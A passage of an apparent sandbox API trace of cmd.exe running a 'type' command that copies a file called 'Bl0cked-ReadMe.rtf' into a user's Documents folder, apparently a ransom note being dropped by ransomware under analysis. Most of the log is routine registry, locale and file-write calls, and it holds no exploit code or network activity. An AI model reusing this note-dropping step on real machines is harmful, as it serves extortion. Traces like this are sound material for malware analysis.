lpData=0x1ee948*=0x1, lpcbData=0x1ee940*=0x4) returned 0x0 [0140.526] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ee944, lpData=0x1ee948, lpcbData=0x1ee940*=0x1000 | out: lpType=0x1ee944*=0x0, lpData=0x1ee948*=0x1, lpcbData=0x1ee940*=0x1000) returned 0x2 [0140.527] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ee944, lpData=0x1ee948, lpcbData=0x1ee940*=0x1000 | out: lpType=0x1ee944*=0x4, lpData=0x1ee948*=0x0, lpcbData=0x1ee940*=0x4) returned 0x0 [0140.527] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ee944, lpData=0x1ee948, lpcbData=0x1ee940*=0x1000 | out: lpType=0x1ee944*=0x4, lpData=0x1ee948*=0x9, lpcbData=0x1ee940*=0x4) returned 0x0 [0140.527] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ee944, lpData=0x1ee948, lpcbData=0x1ee940*=0x1000 | out: lpType=0x1ee944*=0x4, lpData=0x1ee948*=0x9, lpcbData=0x1ee940*=0x4) returned 0x0 [0140.527] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ee944, lpData=0x1ee948, lpcbData=0x1ee940*=0x1000 | out: lpType=0x1ee944*=0x0, lpData=0x1ee948*=0x9, lpcbData=0x1ee940*=0x1000) returned 0x2 [0140.527] RegCloseKey (hKey=0x40) returned 0x0 [0140.527] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636f [0140.527] srand (_Seed=0x5b88636f) [0140.527] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf\"" [0140.527] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf\"" [0140.527] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.527] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3818f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0140.528] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0140.528] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0140.528] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.528] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0140.528] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0140.528] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0140.528] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0140.528] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0140.528] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0140.528] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0140.528] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0140.528] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0140.528] GetEnvironmentStringsW () returned 0x3822e8* [0140.528] FreeEnvironmentStringsW (penv=0x3822e8) returned 1 [0140.528] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.528] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.528] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0140.528] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0140.528] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0140.528] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0140.528] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0140.528] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0140.528] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0140.528] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0140.529] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1ef708 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.529] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1ef708, lpFilePart=0x1ef704 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1ef704*="Desktop") returned 0x18 [0140.529] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.529] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef484 | out: lpFindFileData=0x1ef484) returned 0x380028 [0140.529] FindClose (in: hFindFile=0x380028 | out: hFindFile=0x380028) returned 1 [0140.529] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1ef484 | out: lpFindFileData=0x1ef484) returned 0x380028 [0140.529] FindClose (in: hFindFile=0x380028 | out: hFindFile=0x380028) returned 1 [0140.529] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1ef484 | out: lpFindFileData=0x1ef484) returned 0x380028 [0140.529] FindClose (in: hFindFile=0x380028 | out: hFindFile=0x380028) returned 1 [0140.530] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.530] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0140.530] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0140.530] GetEnvironmentStringsW () returned 0x382b08* [0140.530] FreeEnvironmentStringsW (penv=0x382b08) returned 1 [0140.530] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.530] GetConsoleOutputCP () returned 0x1b5 [0140.531] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.531] GetUserDefaultLCID () returned 0x409 [0140.531] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0140.531] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1ef848, cchData=128 | out: lpLCData="0") returned 2 [0140.531] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1ef848, cchData=128 | out: lpLCData="0") returned 2 [0140.531] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1ef848, cchData=128 | out: lpLCData="1") returned 2 [0140.531] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0140.531] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0140.531] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0140.531] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0140.532] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0140.532] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0140.532] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0140.532] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0140.532] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0140.532] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0140.532] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0140.533] GetConsoleTitleW (in: lpConsoleTitle=0x3708f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.533] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.533] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0140.533] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0140.533] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0140.534] _wcsicmp (_String1="type", _String2=")") returned 75 [0140.534] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0140.534] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0140.534] _wcsicmp (_String1="IF", _String2="type") returned -11 [0140.534] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0140.534] _wcsicmp (_String1="REM", _String2="type") returned -2 [0140.534] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0140.539] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.539] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.539] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.539] GetFileType (hFile=0x7) returned 0x2 [0140.970] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0140.970] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef740 | out: lpMode=0x1ef740) returned 1 [0140.970] _dup (_FileHandle=1) returned 3 [0140.971] _close (_FileHandle=1) returned 0 [0140.971] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0140.971] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef710, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0140.972] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0140.972] GetConsoleTitleW (in: lpConsoleTitle=0x1ef540, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.972] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0140.972] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0140.972] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0140.972] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0140.973] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.973] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x1ef0a4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef0a4) returned 0x370e90 [0140.974] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0140.974] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0140.974] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0140.974] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1edfb0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0140.974] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0140.974] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.974] GetFileType (hFile=0x54) returned 0x1 [0140.974] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.974] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x1ee008 | out: lpFileSizeHigh=0x1ee008*=0x0) returned 0x1632 [0140.974] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.974] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.974] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.975] ReadFile (in: hFile=0x54, lpBuffer=0x1eee40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee030, lpOverlapped=0x0 | out: lpBuffer=0x1eee40*, lpNumberOfBytesRead=0x1ee030*=0x200, lpOverlapped=0x0) returned 1 [0140.975] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.975] GetFileType (hFile=0x4c) returned 0x1 [0140.975] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.975] GetFileType (hFile=0x4c) returned 0x1 [0140.975] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.975] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eee40*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.976] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.976] GetFileType (hFile=0x4c) returned 0x1 [0140.976] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.976] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eee90*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.977] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.977] GetFileType (hFile=0x4c) returned 0x1 [0140.977] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.977] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eeee0*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.977] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.977] GetFileType (hFile=0x4c) returned 0x1 [0140.977] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.977] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eef30*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.977] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.977] GetFileType (hFile=0x4c) returned 0x1 [0140.977] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.977] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eef80*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.977] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.977] GetFileType (hFile=0x4c) returned 0x1 [0140.977] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.977] WriteFile (in: hFile=0x4c, lpBuffer=0x1eefd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eefd0*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.977] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.977] GetFileType (hFile=0x4c) returned 0x1 [0140.978] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.978] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1ef020*, lpNumberOfBytesWritten=0x1ee024*=0x20, lpOverlapped=0x0) returned 1 [0140.978] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.978] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee010 | out: lpNewFilePointer=0x0) returned 1 [0140.978] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.978] ReadFile (in: hFile=0x54, lpBuffer=0x1eee40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee030, lpOverlapped=0x0 | out: lpBuffer=0x1eee40*, lpNumberOfBytesRead=0x1ee030*=0x200, lpOverlapped=0x0) returned 1 [0140.978] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.978] GetFileType (hFile=0x4c) returned 0x1 [0140.978] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.978] GetFileType (hFile=0x4c) returned 0x1 [0140.978] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.978] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eee40*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.978] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.978] GetFileType (hFile=0x4c) returned 0x1 [0140.978] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.978] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eee90*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.978] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.978] GetFileType (hFile=0x4c) returned 0x1 [0140.979] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.979] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eeee0*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.979] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.979] GetFileType (hFile=0x4c) returned 0x1 [0140.979] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.979] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eef30*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.979] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.979] GetFileType (hFile=0x4c) returned 0x1 [0140.979] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.979] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eef80*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.979] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.979] GetFileType (hFile=0x4c) returned 0x1 [0140.979] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.979] WriteFile (in: hFile=0x4c, lpBuffer=0x1eefd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eefd0*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.979] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.979] GetFileType (hFile=0x4c) returned 0x1 [0140.980] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.980] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1ef020*, lpNumberOfBytesWritten=0x1ee024*=0x20, lpOverlapped=0x0) returned 1 [0140.980] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.980] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee010 | out: lpNewFilePointer=0x0) returned 1 [0140.980] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.980] ReadFile (in: hFile=0x54, lpBuffer=0x1eee40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee030, lpOverlapped=0x0 | out: lpBuffer=0x1eee40*, lpNumberOfBytesRead=0x1ee030*=0x200, lpOverlapped=0x0) returned 1 [0140.980] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.980] GetFileType (hFile=0x4c) returned 0x1 [0140.980] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.980] GetFileType (hFile=0x4c) returned 0x1 [0140.980] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.980] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eee40*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.980] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.980] GetFileType (hFile=0x4c) returned 0x1 [0140.980] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.980] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eee90*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.980] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.981] GetFileType (hFile=0x4c) returned 0x1 [0140.981] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.981] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eeee0*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.983] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.984] GetFileType (hFile=0x4c) returned 0x1 [0140.984] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.984] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eef30*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.984] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.984] GetFileType (hFile=0x4c) returned 0x1 [0140.984] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.984] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eef80*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.984] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.984] GetFileType (hFile=0x4c) returned 0x1 [0140.984] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.984] WriteFile (in: hFile=0x4c, lpBuffer=0x1eefd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eefd0*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.984] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.984] GetFileType (hFile=0x4c) returned 0x1 [0140.984] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.984] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1ef020*, lpNumberOfBytesWritten=0x1ee024*=0x20, lpOverlapped=0x0) returned 1 [0140.984] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.984] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee010 | out: lpNewFilePointer=0x0) returned 1 [0140.984] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.984] ReadFile (in: hFile=0x54, lpBuffer=0x1eee40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee030, lpOverlapped=0x0 | out: lpBuffer=0x1eee40*, lpNumberOfBytesRead=0x1ee030*=0x200, lpOverlapped=0x0) returned 1 [0140.984] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.984] GetFileType (hFile=0x4c) returned 0x1 [0140.984] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.984] GetFileType (hFile=0x4c) returned 0x1 [0140.984] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.985] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eee40*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.985] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.985] GetFileType (hFile=0x4c) returned 0x1 [0140.985] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.985] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eee90*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.985] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.985] GetFileType (hFile=0x4c) returned 0x1 [0140.985] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.985] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eeee0*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.985] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.985] GetFileType (hFile=0x4c) returned 0x1 [0140.985] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.985] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eef30*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.985] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.985] GetFileType (hFile=0x4c) returned 0x1 [0140.985] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.985] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eef80*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.985] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.985] GetFileType (hFile=0x4c) returned 0x1 [0140.985] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.985] WriteFile (in: hFile=0x4c, lpBuffer=0x1eefd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eefd0*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) 